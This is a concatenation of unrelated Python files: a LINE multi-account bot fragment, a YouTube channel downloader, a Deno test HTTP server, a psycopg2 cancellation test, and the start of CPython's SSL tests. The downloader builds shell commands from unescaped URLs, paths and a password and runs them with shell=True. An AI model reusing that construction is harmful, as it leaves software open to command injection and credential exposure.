profile.displayName = wait["cName"]
cl.updateProfile(profile)
profile2 = ki.getProfile()
profile2.displayName = wait["cName2"]
ki.updateProfile(profile2)
profile3 = kk.getProfile()
profile3.displayName = wait["cName3"]
kk.updateProfile(profile3)
profile4 = kc.getProfile()
profile4.displayName = wait["cName4"]
kc.updateProfile(profile4)
profile5 = ks.getProfile()
profile5.displayName = wait["cName5"]
ks.updateProfile(profile5)
time.sleep(600)
except:
pass
thread2 = threading.Thread(target=nameUpdate)
thread2.daemon = True
thread2.start()
while True:
try:
Ops = cl.fetchOps(cl.Poll.rev, 5)
except EOFError:
raise Exception("It might be wrong revision\n" + str(cl.Poll.rev))
for Op in Ops:
if (Op.type != OpType.END_OF_OPERATION):
cl.Poll.rev = max(cl.Poll.rev, Op.revision)
bot(Op)
|
watcher.py
|
#!/usr/bin/env python3
# coding=utf-8
'''
#-------------------------------------------------------------------------------
Project : YouTube Watcher
Module : watcher
Purpose : Track YouTube channels and download new videos
Version : 0.5.2 beta
Status : Development
Modified :
Created :
Author : Burak Tokman
Email : buraktokman@hotmail.com
Copyright : 2021, Bulrosa OU
Licence : EULA
Unauthorized copying of this file, via any medium is strictly prohibited
Proprietary and confidential
#-------------------------------------------------------------------------------
'''
from pathlib import Path
import subprocess
import threading
import datetime
import json
import time
# import pync
import sys
import os
CONFIG = { 'download' : True,
'login' : False,
'username' : '',
'password' : '',
'playlist-file' : str(Path(Path(__file__).parents[0] / 'playlist.txt')),
'history-file' : str(Path(Path(__file__).parents[0] / 'history.txt')),
'download-dir' : '/Volumes/WD/_VIDEO', # '~/Desktop/_VID'
'update-interval' : 3, # Hour
'thread-count' : 1}
# ------------------------------------------
def update_youtube():
st = 'pip3 install --upgrade youtube-dl'
with subprocess.Popen(st, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
output, errors = p.communicate()
def timestamp():
now = datetime.datetime.utcnow()
output = '%.2d:%.2d:%.2d' % ((now.hour + 3) % 24, now.minute, now.second)
return output
def parse_urls(playlist):
st = 'youtube-dl -j --flat-playlist \'' + str(playlist) + '\''
with subprocess.Popen(st, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) as p:
output, errors = p.communicate()
lines = output.decode('utf-8').splitlines()
# print(lines)
urls = []
# Take first 2 videos
i=1
for url in lines:
t = json.loads(url)
# print(t['url'] + ' → ' + t['title'])
id_temp = t['url']
urls.append(id_temp)
if i == 2:
break
i+=1
# ERROR
if len(urls) is 0:
print("ERROR → No video found in playlist/channel. Update module.\npip3 install --upgrade youtube-dl")
update_youtube()
# exit()
# Return
# print( timestamp() + ' → Video count → ' + '' + str(len(urls)))
return urls
def download_video(url):
global CONFIG
# Check if download dir is available
if not os.path.isdir(CONFIG['download-dir']):
print(' → CAUTION → ' + 'Download dir not available. ~/Desktop used as default')
CONFIG['download-dir'] = '~/Desktop'
# youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/bestvideo+bestaudio' --merge-output-format mp4
formats = ['22', '136', '18']
download_status = False
for format_temp in formats:
if CONFIG['login'] == True: login_temp = '-u ' + str(CONFIG['username']) + ' -p ' + CONFIG['password']
else: login_temp = ''
st = 'cd ' + CONFIG['download-dir'] + '&& youtube-dl ' + str(login_temp) + ' -f ' + format_temp + ' http://www.youtube.com/watch?v=' + str(url)
lines = os.popen(st).read()
if '100%' in lines:
download_status = True
break
# elif 'ERROR' in lines:
# Return
return download_status
def check_new_urls(urls):
global CONFIG
with open(CONFIG['history-file']) as f:
content = f.readlines()
content = [x.strip() for x in content]
# print(content)
urls_new = []
for url in urls:
if url not in content:
urls_new.append(url)
return urls_new
def write_to_history(url):
global CONFIG
with open(CONFIG['history-file'], 'a') as f:
f.write(url + '\n')
def load_playlists():
global CONFIG
with open(CONFIG['playlist-file'], encoding='utf-8') as f:
content = f.readlines()
temp_list = [x.strip() for x in content]
playlist = []
for line in temp_list:
temp_line = line.split(',')
temp_dict = {'name' : temp_line[0], 'url' : temp_line[1]}
playlist.append(temp_dict)
return playlist
def process_playlists(playlists):
global CONFIG
for playlist in playlists:
time_start_temp = time.time()
if '#' in playlist['name']:
print( timestamp() + ' → WATCHER → ' + 'SKIPPING > ' + str(playlist['name']))
continue
else:
print( timestamp() + ' → WATCHER → ' + '' + str(playlist['name']))
# Get video URLs from playlist
print( timestamp() + ' → ' + 'Fetching URLs ...')
urls = parse_urls(playlist['url'])
# Compare w/ history & Select new URLs
# print( timestamp() + ' → Selecting new videos ...')
urls = check_new_urls(urls)
if len(urls) == 0:
print( timestamp() + ' → WATCHER → ' + 'No new video (' + str(round((time.time() - time_start_temp), 2)) + 's)\n' + '• • •')
else:
# Process
for url in urls:
# Download
print( timestamp() + ' → WATCHER → ' + 'Downloading → ' + str(url))
if CONFIG['download'] == True:
r = download_video(url)
else:
r = True
# Get Video Title
command = 'youtube-dl --get-title http://www.youtube.com/watch?v=' + str(url)
try:
if CONFIG['download'] == True:
title = subprocess.check_output(command, shell=True).decode('utf-8')
title = title.replace('\n', '') # Trim
except Exception as e:
print(timestamp() + ' → ERROR → Can\'t get video title')
print(str(e))
title = 'New video'
print( timestamp() + ' → WATCHER → ' + '' + str(title))
# Notify
try:
if CONFIG['download'] == True:
title = playlist['name'] + ' → ' + title
# pync.notify(title, appIcon=str(Path(Path(os.path.abspath(__file__)).parents[0] / 'youtube.png'))) # title='New Video' # youtube.png
except Exception as e:
print(timestamp() + ' → ERROR → Notification error')
if r == True:
# Log
write_to_history(url)
print( timestamp() + ' → WATCHER → ' + 'Written to history → ' + str(url) + '\n')
else:
print(timestamp() + ' → ERROR → Occured. Cannot download video')
print( timestamp() + ' → WATCHER → ' + 'Thread finished')
# Raise exception
exit()
# try:
# print(error)
# except Exception as e:
# raise
# ------------------------------------------
def main():
global CONFIG
time_start = time.time()
# Load Playlists from file
playlists = load_playlists()
# Divide playlists for threads
playlists = [playlists[i::CONFIG['thread-count']] for i in range(CONFIG['thread-count'])]
# Define threads
threads = []
for x in range(0, CONFIG['thread-count']):
print( timestamp() + ' → WATCHER → ' + 'THREAD ' + str(x) + ' → Configured')
thread_name = 'T' + str(x) + '-youtube-watcher'
t = threading.Thread(name=thread_name, target=process_playlists, args=(playlists[x], ))
threads.append(t)
# Start threads
for x in range(0, CONFIG['thread-count']):
print( timestamp() + ' → WATCHER → ' + 'THREAD ' + str(x) + ' → Started')
threads[x].start()
# Wait threads
# for x in range(0, CONFIG['thread-count']):
# print( timestamp() + ' → WATCHER → ' + 'Waiting thread ' + str(x) + ' to finish')
# threads[x].join()
# print( timestamp() + ' → WATCHER → ' + 'Thread ' + str(x) + ' finished')
# print( timestamp() + ' → WATCHER → ' + 'Channels processed (' + str(i) + ' / ' + str(len(playlists)) + ') [' + str(round((time.time() - time_start) / 60, 2)) + 'm]\n' + '• • •')
if __name__ == '__main__':
main()
# time_left = UPDATE_INTERVAL
# done = False
# while True:
# main()
# while not done:
# time_left = time_left - (10 / 60 / 60)
# st = '{} Scan completed. Next loop in {:.2f} hours'.format(timestamp(), round(time_left, 3))
# print(st, end='\r')
# time.sleep(10)
# if time_left <= 0:
# print()
# done = True
# import youtube_dl
# download_video('8yB_UEVwuRM')
# input_file = load_playlists()
# for video in input_file:
# print(video)
# ydl_opts = {
# 'ignoreerrors': True}
# with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# info_dict = ydl.extract_info(video, download=False)
# for i in info_dict:
# video_thumbnail = info_dict.get("thumbnail"),
# video_id = info_dict.get("id"),
# video_title = info_dict.get("title"),
# video_description = info_dict.get("description"),
# video_duration = info_dict.get("duration")
|
http_server.py
|
#!/usr/bin/env python
# Copyright 2018 the Deno authors. All rights reserved. MIT license.
# Many tests expect there to be an http server on port 4545 servering the deno
# root directory.
import os
import sys
from threading import Thread
import SimpleHTTPServer
import SocketServer
from util import root_path
from time import sleep
PORT = 4545
REDIRECT_PORT = 4546
def server():
os.chdir(root_path) # Hopefully the main thread doesn't also chdir.
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
SocketServer.TCPServer.allow_reuse_address = True
s = SocketServer.TCPServer(("", PORT), Handler)
print "Deno test server http://localhost:%d/" % PORT
return s
def redirect_server():
os.chdir(root_path)
target_host = "http://localhost:%d" % PORT
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(301)
self.send_header('Location', target_host + self.path)
self.end_headers()
Handler = RedirectHandler
SocketServer.TCPServer.allow_reuse_address = True
s = SocketServer.TCPServer(("", REDIRECT_PORT), Handler)
print "Deno redirect server http://localhost:%d/ -> http://localhost:%d/" % (
REDIRECT_PORT, PORT)
return s
def spawn():
# Main http server
s = server()
thread = Thread(target=s.serve_forever)
thread.daemon = True
thread.start()
# Redirect server
rs = redirect_server()
r_thread = Thread(target=rs.serve_forever)
r_thread.daemon = True
r_thread.start()
sleep(1) # TODO I'm too lazy to figure out how to do this properly.
return thread
if __name__ == '__main__':
try:
thread = spawn()
while thread.is_alive():
sleep(10)
except KeyboardInterrupt:
pass
sys.exit(1)
|
test_cancel.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# test_cancel.py - unit test for query cancellation
#
# Copyright (C) 2010-2011 Jan Urbański <wulczer@wulczer.org>
#
# psycopg2 is free software: you can redistribute it and/or modify it
# under the terms of the GNU Lesser General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# In addition, as a special exception, the copyright holders give
# permission to link this program with the OpenSSL library (or with
# modified versions of OpenSSL that use the same license as OpenSSL),
# and distribute linked combinations including the two.
#
# You must obey the GNU Lesser General Public License in all respects for
# all of the code used other than OpenSSL.
#
# psycopg2 is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
# License for more details.
import time
import threading
import psycopg2
import psycopg2.extensions
from psycopg2 import extras
from .testconfig import dsn
from .testutils import unittest, ConnectingTestCase, skip_before_postgres, slow
class CancelTests(ConnectingTestCase):
def setUp(self):
ConnectingTestCase.setUp(self)
cur = self.conn.cursor()
cur.execute(
"""
CREATE TEMPORARY TABLE table1 (
id int PRIMARY KEY
)"""
)
self.conn.commit()
def test_empty_cancel(self):
self.conn.cancel()
@slow
@skip_before_postgres(8, 2)
def test_cancel(self):
errors = []
def neverending(conn):
cur = conn.cursor()
try:
self.assertRaises(
psycopg2.extensions.QueryCanceledError,
cur.execute,
"select pg_sleep(60)",
)
# make sure the connection still works
conn.rollback()
cur.execute("select 1")
self.assertEqual(cur.fetchall(), [(1,)])
except Exception as e:
errors.append(e)
raise
def canceller(conn):
cur = conn.cursor()
try:
conn.cancel()
except Exception as e:
errors.append(e)
raise
del cur
thread1 = threading.Thread(target=neverending, args=(self.conn,))
# wait a bit to make sure that the other thread is already in
# pg_sleep -- ugly and racy, but the chances are ridiculously low
thread2 = threading.Timer(0.3, canceller, args=(self.conn,))
thread1.start()
thread2.start()
thread1.join()
thread2.join()
self.assertEqual(errors, [])
@slow
@skip_before_postgres(8, 2)
def test_async_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
self.assertRaises(psycopg2.OperationalError, async_conn.cancel)
extras.wait_select(async_conn)
cur = async_conn.cursor()
cur.execute("select pg_sleep(10)")
time.sleep(1)
self.assertTrue(async_conn.isexecuting())
async_conn.cancel()
self.assertRaises(
psycopg2.extensions.QueryCanceledError, extras.wait_select, async_conn
)
cur.execute("select 1")
extras.wait_select(async_conn)
self.assertEqual(cur.fetchall(), [(1,)])
def test_async_connection_cancel(self):
async_conn = psycopg2.connect(dsn, async_=True)
async_conn.close()
self.assertTrue(async_conn.closed)
def test_suite():
return unittest.TestLoader().loadTestsFromName(__name__)
if __name__ == "__main__":
unittest.main()
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
import unittest.mock
from test import support
from test.support import socket_helper
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import threading
import traceback
import asyncore
import weakref
import platform
import sysconfig
import functools
try:
import ctypes
except ImportError:
ctypes = None
ssl = support.import_module("ssl")
from ssl import TLSVersion, _TLSContentType, _TLSMessageType
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
Py_DEBUG_WIN32 = Py_DEBUG and sys.platform == 'win32'
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = socket_helper.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1_0 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
IS_OPENSSL_1_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 1)
PY_SSL_DEFAULT_CIPHERS = sysconfig.get_config_var('PY_SSL_DEFAULT_CIPHERS')
PROTOCOL_TO_TLS_VERSION = {}
for proto, ver in (
("PROTOCOL_SSLv23", "SSLv3"),
("PROTOCOL_TLSv1", "TLSv1"),
("PROTOCOL_TLSv1_1", "TLSv1_1"),
):
try:
proto = getattr(ssl, proto)
ver = getattr(ssl.TLSVersion, ver)
except AttributeError:
continue
PROTOCOL_TO_TLS_VERSION[proto] = ver
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
CERTFILE_PROTECTED = data_file("keycert.passwd.pem")
ONLYKEY_PROTECTED = data_file("ssl_key.passwd.pem")
KEY_PASSWORD = "somepass"
CAPATH = data_file("capath")
BYTES_CAPATH = os.fsencode(CAPATH)
CAFILE_NEURONIO = data_file("capath", "4e1295a3.0")
CAFILE_CACERT = data_file("capath", "5ed36f99.0")
CERTFILE_INFO = {
'issuer': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'notAfter': 'Aug 26 14:23:15 2028 GMT',
'notBefore': 'Aug 29 14:23:15 2018 GMT',
'serialNumber': '98A7CF88C74A32ED',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
# empty CRL
CRLFILE = data_file("revocation.crl")
# Two keys and certs signed by the same CA (for SNI tests)
SIGNED_CERTFILE = data_file("keycert3.pem")
SIGNED_CERTFILE_HOSTNAME = 'localhost'
SIGNED_CERTFILE_INFO = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer': ((('countryName', 'XY'),),
(('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)),
'notAfter': 'Jul 7 14:23:16 2028 GMT',
'notBefore': 'Aug 29 14:23:16 2018 GMT',
'serialNumber': 'CB2D80995A69525C',
'subject': ((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'localhost'),)),
'subjectAltName': (('DNS', 'localhost'),),
'version': 3
}
SIGNED_CERTFILE2 = data_file("keycert4.pem")
SIGNED_CERTFILE2_HOSTNAME = 'fakehostname'
SIGNED_CERTFILE_ECC = data_file("keycertecc.pem")
SIGNED_CERTFILE_ECC_HOSTNAME = 'localhost-ecc'
# Same certificate as pycacert.pem, but without extra text in file
SIGNING_CA = data_file("capath", "ceff1710.0")
# cert with all kinds of subject alt names
ALLSANFILE = data_file("allsans.pem")
IDNSANSFILE = data_file("idnsans.pem")
REMOTE_HOST = "self-signed.pythontest.net"
EMPTYCERT = data_file("nullcert.pem")
BADCERT = data_file("badcert.pem")
NONEXISTINGCERT = data_file("XXXnonexisting.pem")
BADKEY = data_file("badkey.pem")
NOKIACERT = data_file("nokia.pem")
NULLBYTECERT = data_file("nullbytecert.pem")
TALOS_INVALID_CRLDP = data_file("talos-2019-0758.pem")
DHFILE = data_file("ffdh3072.pem")
BYTES_DHFILE = os.fsencode(DHFILE)
# Not defined in all versions of OpenSSL
OP_NO_COMPRESSION = getattr(ssl, "OP_NO_COMPRESSION", 0)
OP_SINGLE_DH_USE = getattr(ssl, "OP_SINGLE_DH_USE", 0)
OP_SINGLE_ECDH_USE = getattr(ssl, "OP_SINGLE_ECDH_USE", 0)
OP_CIPHER_SERVER_PREFERENCE = getattr(ssl, "OP_CIPHER_SERVER_PREFERENCE", 0)
OP_ENABLE_MIDDLEBOX_COMPAT = getattr(ssl, "OP_ENABLE_MIDDLEBOX_COMPAT", 0)
def has_tls_protocol(protocol):
"""Check if a TLS protocol is available and enabled
:param protocol: enum ssl._SSLMethod member or name
:return: bool
"""
if isinstance(protocol, str):
assert protocol.startswith('PROTOCOL_')
protocol = getattr(ssl, protocol, None)
if protocol is None:
return False
if protocol in {
ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS_SERVER,
ssl.PROTOCOL_TLS_CLIENT
}:
# auto-negotiate protocols are always available
return True
name = protocol.name
return has_tls_version(name[len('PROTOCOL_'):])
@functools.lru_cache
def has_tls_version(version):
"""Check if a TLS/SSL version is enabled
:param version: TLS version name or ssl.TLSVersion member
:return: bool
"""
if version == "SSLv2":
# never supported and not even in TLSVersion enum
return False
if isinstance(version, str):
version = ssl.TLSVersion.__members__[version]
# check compile time flags like ssl.HAS_TLSv1_2
if not getattr(ssl, f'HAS_{version.name}'):
return False
# check runtime and dynamic crypto policy settings. A TLS version may
# be compiled in but disabled by a policy or config option.
ctx = ssl.SSLContext()
if (
hasattr(ctx, 'minimum_version') and
ctx.minimum_version != ssl.TLSVersion.MINIMUM_SUPPORTED and
version < ctx.minimum_version
):
return False
if (
hasattr(ctx, 'maximum_version') and
ctx.maximum_version != ssl.TLSVersion.MAXIMUM_SUPPORTED and
version > ctx.maximum_version
):
return False
return True
def requires_tls_version(version):
"""Decorator to skip tests when a required TLS version is not available
:param version: TLS version name or ssl.TLSVersion member
:return:
"""
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kw):
if not has_tls_version(version):
raise unittest.SkipTest(f"{version} is not available.")
else:
return func(*args, **kw)
return wrapper
return decorator
requires_minimum_version = unittest.skipUnless(
hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL >= 1.1.0g"
)
def handle_error(prefix):
exc_format = ' '.join(traceback.format_exception(*sys.exc_info()))
if support.verbose:
sys.stdout.write(prefix + exc_format)
def can_clear_options():
# 0.9.8m or higher
return ssl._OPENSSL_API_VERSION >= (0, 9, 8, 13, 15)
def no_sslv2_implies_sslv3_hello():
# 0.9.7h or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 7, 8, 15)
def have_verify_flags():
# 0.9.8 or higher
return ssl.OPENSSL_VERSION_INFO >= (0, 9, 8, 0, 15)
def _have_secp_curves():
if not ssl.HAS_ECDH:
return False
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
try:
ctx.set_ecdh_curve("secp384r1")
except ValueError:
return False
else:
return True
HAVE_SECP_CURVES = _have_secp_curves()
def utc_offset(): #NOTE: ignore issues like #1647654
# local time = utc time + utc offset
if time.daylight and time.localtime().tm_isdst > 0:
return -time.altzone # seconds
return -time.timezone
def asn1time(cert_time):
# Some versions of OpenSSL ignore seconds, see #18207
# 0.9.8.i
if ssl._OPENSSL_API_VERSION == (0, 9, 8, 9, 15):
fmt = "%b %d %H:%M:%S %Y GMT"
dt = datetime.datetime.strptime(cert_time, fmt)
dt = dt.replace(second=0)
cert_time = dt.strftime(fmt)
# %d adds leading zero but ASN1_TIME_print() uses leading space
if cert_time[4] == "0":
cert_time = cert_time[:4] + " " + cert_time[5:]
return cert_time
needs_sni = unittest.skipUnless(ssl.HAS_SNI, "SNI support needed for this test")
def test_wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLS, *,
cert_reqs=ssl.CERT_NONE, ca_certs=None,
ciphers=None, certfile=None, keyfile=None,
**kwargs):
context = ssl.SSLContext(ssl_version)
if cert_reqs is not None:
if cert_reqs == ssl.CERT_NONE:
context.check_hostname = False
context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
support.wait_process(pid, exitcode=0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', 'python-dev@python.org'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', 'null@python.org\x00user@example.org'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', 'user@example.org'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 4.0
self.assertLess(n, 0x40000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 1)
self.assertLess(major, 4)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
